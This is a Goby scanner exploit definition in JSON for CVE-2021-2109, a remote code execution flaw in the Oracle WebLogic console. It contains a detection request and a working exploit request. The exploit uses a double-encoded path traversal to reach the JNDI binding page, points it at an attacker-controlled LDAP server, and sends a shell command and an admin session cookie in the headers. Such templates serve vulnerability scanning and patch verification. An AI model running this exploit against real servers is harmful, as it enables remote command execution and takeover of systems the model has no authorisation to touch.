{ "Name": "Oracle Weblogic LDAP RCE CVE-2021-2109", "Level": "3", "Tags": [ "RCE" ], "GobyQuery": "app=\"Oracle-WeblogicPortal\" || app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"", "Description": "Oracle WebLogic Server is the industry leading application server for building enterprise applications using Java EE standards, and deploying them on a reliable, scalable runtime with low cost of ownership. It is strategically integrated with Oracle’s full product and cloud service portfolio. Oracle WebLogic Server provides compatibility with prior versions, and supports new features for developer productivity, high availability, manageability and deployment to cloud native Kubernetes-based environments.", "Product": "Oracle Weblogic", "Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html", "Author": "", "Impact": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).", "Recommendation": "", "References": [ "https://nvd.nist.gov/vuln/detail/CVE-2021-2109" ], "HasExp": true, "ExpParams": [ { "Name": "Cmd", "Type": "input", "Value": "whoami" }, { "Name": "Ldap", "Type": "input", "Value": "ldap://xxx.xxx.xxx;xxx:1389" }, { "Name": "Cookie", "Type": "input", "Value": "ADMINCONSOLESESSION=xxxxx" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/console/css/%252e%252e%252f/consolejndi.portal?", "follow_redirect": true, "header": null, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "JNDI", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{{{Ldap}}}/Basic/WeblogicEcho;AdminServer%22)", "follow_redirect": true, "header": { "cmd": "{{{Cmd}}}", "Cookie": "{{{Cookie}}}" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [] } ], "PostTime": "0000-00-00 00:00:00", "GobyVersion": "0.0.0" }